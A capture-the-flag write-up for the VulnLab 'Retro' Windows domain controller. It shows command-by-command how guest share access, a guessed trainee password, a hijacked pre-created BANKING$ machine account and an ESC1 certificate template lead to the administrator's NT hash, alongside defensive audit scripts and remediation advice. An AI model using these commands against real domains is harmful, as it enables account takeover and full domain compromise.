Retro
A Windows machine on the VulnLab platform named “retro”, categorized as easy difficulty. After gaining a foothold, we compromise a pre-created machine account and exploit an ADCS vulnerability.
We start with a classic Nmap scan.
```
➜ retro nmap -p- --min-rate 10000 10.10.109.4 -oN port.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-23 13:34 +04
Nmap scan report for 10.10.109.4
Host is up (0.14s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
9389/tcp  open  adws
49664/tcp open  unknown
49669/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 20.63 seconds
```
When I tried NULL authentication, I didn’t get anything, but accessing the shares using the guest account was possible.
```
➜ retro netexec smb retro.vl -u 'guest' -p '' --shares
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\guest:
SMB 10.10.109.4 445 DC [*] Enumerated shares
SMB 10.10.109.4 445 DC Share      Permissions  Remark
SMB 10.10.109.4 445 DC -----      -----------  ------
SMB 10.10.109.4 445 DC ADMIN$                  Remote Admin
SMB 10.10.109.4 445 DC C$                      Default share
SMB 10.10.109.4 445 DC IPC$       READ         Remote IPC
SMB 10.10.109.4 445 DC NETLOGON                Logon server share
SMB 10.10.109.4 445 DC Notes
SMB 10.10.109.4 445 DC SYSVOL                  Logon server share
SMB 10.10.109.4 445 DC Trainees   READ
```
After that, we connect to the Trainees share using impacket-smbclient and download the Important.txt file.
```
➜ retro impacket-smbclient retro.vl/guest@10.10.109.4 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 02:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 13:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 02:16:11 2023 Important.txt
# get Important.txt
```
As we can see, the IT team is frustrated with the trainees constantly requesting password resets, so they’ve been given a single shared account.
```
➜ retro cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
```
It’s possible to enumerate domain users with the guest account by brute-forcing RIDs with `--rid-brute` (Impacket’s lookupsid.py does the same).
```
➜ retro netexec smb retro.vl -u 'guest' -p '' --rid-brute
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\guest:
SMB 10.10.109.4 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
<REDACTED>
SMB 10.10.109.4 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.109.4 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.109.4 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.109.4 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.109.4 445 DC 1109: RETRO\tblack (SidTypeUser)
```
We guess the trainee account’s password, and it works on the very first try.
```
➜ retro netexec smb retro.vl -u trainee -p <REDACTED>
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\trainee:<REDACTED>
```
We check the shares again using the trainee account.
```
➜ retro impacket-smbclient retro.vl/trainee:'<REDACTED>'@10.10.109.4
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 02:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 13:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 02:05:56 2023 ToDo.txt
# get ToDo.txt
```
```
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
```
The ToDo file mentions a computer account that was pre-created in Active Directory. When such an account is created with the “Assign this computer account as a pre-Windows 2000 computer” option enabled, its default password is the computer name in lowercase (the sAMAccountName without the trailing $). As long as no machine has ever joined the domain with this account, that default password is still in place, which gives us the opportunity to change it ourselves.
```
➜ retro impacket-changepasswd -protocol rpc-samr retro.vl/BANKING\$@10.10.109.4 -newpass xpp
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
```
Verify the credentials.
```
➜ retro netexec smb retro.vl -u 'BANKING$' -p xpp
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\BANKING$:xpp
```
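The pre-created account is easy to spot from the defender's side, because the “pre-Windows 2000” option leaves the PASSWD_NOTREQD bit (0x20) set in userAccountControl, and an account that no machine has joined with has never logged on. The following audit script is an added example for this writeup, not part of the original post or of any tool used in it; the computer records it evaluates are constructed (the BANKING$ entry mirrors the account from the box, the other values are assumed), and in a live audit you would pull sAMAccountName, userAccountControl and logonCount for every computer object over LDAP and pass them in unchanged.

```python
"""Audit computer accounts for the pre-created (pre-Windows 2000) pattern.

Added example for this writeup; not the original post's code and not the
code of Impacket or NetExec. The records below are constructed.
"""
from dataclasses import dataclass
from typing import List

# userAccountControl bits (Windows ADS_USER_FLAG values)
UF_PASSWD_NOTREQD = 0x0020              # "password not required"
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000   # member workstation / member server
UF_SERVER_TRUST_ACCOUNT = 0x2000        # domain controller

# LDAP filter a defender can run as-is against the domain partition; the OID
# is the bitwise-AND matching rule, so this selects computers with 0x20 set.
PRE_CREATED_LDAP_FILTER = (
    "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=32))"
)


@dataclass(frozen=True)
class ComputerRecord:
    sam_account_name: str      # e.g. "BANKING$"
    user_account_control: int  # userAccountControl as returned by the DC
    logon_count: int           # logonCount (0 = never logged on)


def is_machine_account(uac: int) -> bool:
    """True for workstation/server and DC trust accounts, False for user objects."""
    return bool(uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT))


def is_pre_created(rec: ComputerRecord) -> bool:
    """Match the pattern from the writeup: a machine account that still has
    PASSWD_NOTREQD set (UAC 4128 = 0x1000 | 0x20 for a workstation) and that
    has never been used to log on. Such an account most likely still carries
    the default password derived from its name."""
    uac = rec.user_account_control
    return (
        is_machine_account(uac)
        and bool(uac & UF_PASSWD_NOTREQD)
        and rec.logon_count == 0
    )


def audit(records: List[ComputerRecord]) -> List[str]:
    """Return the sAMAccountNames that match the pre-created pattern, sorted."""
    return sorted(r.sam_account_name for r in records if is_pre_created(r))


# Constructed sample data (assumed values, not taken from the box):
SAMPLE_RECORDS = [
    ComputerRecord("BANKING$", 4128, 0),    # pre-created, never joined
    ComputerRecord("DC$", 532480, 1200),    # 0x82000: DC + trusted for delegation
    ComputerRecord("WS01$", 4096, 57),      # normal joined workstation
    ComputerRecord("LEGACY$", 4128, 3),     # flag still set, but it has logged on
    ComputerRecord("svc_backup", 512, 0),   # ordinary user object, ignored
]

if __name__ == "__main__":
    for name in audit(SAMPLE_RECORDS):
        print(f"[!] pre-created computer account that was never used: {name}")
    print("LDAP filter for a live check:", PRE_CREATED_LDAP_FILTER)
```

The remediation for every hit is the same: either delete the stale object or reset its password to a random value, and stop using the pre-Windows 2000 option when staging accounts.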
Next, let’s check whether the domain’s certificate authority publishes any vulnerable certificate templates we can exploit.
```
➜ retro certipy-ad find -u 'BANKING$' -p 'xpp' -dc-ip 10.10.109.4 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
<SNIP>
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
```
Certipy reports ESC1 on the RetroClients template. Since the Domain Computers group can enroll in it and BANKING$ is a member of that group, the rest becomes much easier: we can request a certificate and supply the administrator’s UPN as the subject alternative name ourselves.
```
➜ retro certipy-ad req -u BANKING\$@retro.vl -p 'xpp' -target-ip 10.10.109.4 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'RETRO.VL' at '1.1.1.1'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.109.4[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.109.4[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
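Certipy's ESC1 verdict boils down to four template attributes that any authenticated principal can read from the Configuration partition: the enrollee may supply the subject (msPKI-Certificate-Name-Flag bit 0x1), the EKUs permit client authentication, no manager approval is pending (msPKI-Enrollment-Flag bit 0x2) and no authorized signatures are required (msPKI-RA-Signature = 0), combined with an enroll right for a low-privileged group. The script below is an added example for this writeup, not Certipy's code; the template records are constructed, with the RetroClients entry filled in to match what the find output above reports and every other value assumed. Note also the “Certificate has no object SID” line above: since KB5014754, a domain controller in full enforcement mode rejects such certificates for logon unless a strong mapping exists, so auditing which templates produce them is the same check from the other side.

```python
"""Flag certificate templates that meet the ESC1 conditions.

Added example for this writeup; not the original post's code and not
Certipy's. All template records below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List

# msPKI-Certificate-Name-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002   # CA manager approval required

# EKUs that make the issued certificate usable to authenticate a principal
CLIENT_AUTH_EKUS = frozenset({
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
})

# Enroll rights for these principals make a template reachable by nearly everyone
LOW_PRIV_PRINCIPALS = frozenset({
    "Authenticated Users", "Domain Users", "Domain Computers", "Everyone",
})


@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool                      # published on at least one CA
    name_flag: int                     # msPKI-Certificate-Name-Flag
    enrollment_flag: int               # msPKI-Enrollment-Flag
    ra_signatures: int                 # msPKI-RA-Signature
    ekus: FrozenSet[str]               # pKIExtendedKeyUsage; empty = no restriction
    enroll_principals: FrozenSet[str]  # principals holding the Enroll right


def allows_client_auth(ekus: FrozenSet[str]) -> bool:
    """An empty EKU list means the certificate is valid for any purpose."""
    return not ekus or bool(ekus & CLIENT_AUTH_EKUS)


def esc1_findings(t: Template) -> List[str]:
    """Return the low-privileged principals that could abuse `t` via ESC1,
    or an empty list when any of the ESC1 preconditions is missing."""
    if not t.enabled:
        return []
    if not (t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
        return []                                   # subject comes from AD
    if not allows_client_auth(t.ekus):
        return []                                   # cannot be used for logon
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        return []                                   # a manager must approve
    if t.ra_signatures > 0:
        return []                                   # enrollment agent signature needed
    return sorted(t.enroll_principals & LOW_PRIV_PRINCIPALS)


def esc1_report(templates: List[Template]) -> Dict[str, List[str]]:
    """Map each vulnerable template name to the principals that can abuse it."""
    report: Dict[str, List[str]] = {}
    for t in templates:
        hits = esc1_findings(t)
        if hits:
            report[t.name] = hits
    return report


# Constructed sample templates (assumed attribute values):
SAMPLE_TEMPLATES = [
    # Matches the finding in the writeup: Domain Computers can enroll, enrollee
    # supplies the subject, client authentication EKU.
    Template("RetroClients", True, 0x1, 0x0, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}),
             frozenset({"Domain Computers", "Domain Admins"})),
    # Subject built from the AD object (default User template style): safe.
    Template("User", True, 0xA6000000, 0x29, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
    # Enrollee supplies subject, but only Server Authentication: not ESC1.
    Template("WebServer", True, 0x1, 0x0, 0,
             frozenset({"1.3.6.1.5.5.7.3.1"}), frozenset({"Domain Users"})),
    # Same as RetroClients but every request waits for manager approval.
    Template("ApprovedClients", True, 0x1, 0x2, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
]

if __name__ == "__main__":
    for name, who in esc1_report(SAMPLE_TEMPLATES).items():
        print(f"[!] ESC1: {name} enrollable by {', '.join(who)}")
```

Fixing a hit means clearing the enrollee-supplies-subject flag (or removing the client authentication EKU) and tightening the enroll ACL; enabling manager approval is the stop-gap that turns the finding off immediately.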
Now we can authenticate using the administrator certificate.
```
➜ retro certipy-ad auth -pfx administrator.pfx -username administrator -domain retro.vl -dc-ip 10.10.109.4
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
```
That’s it!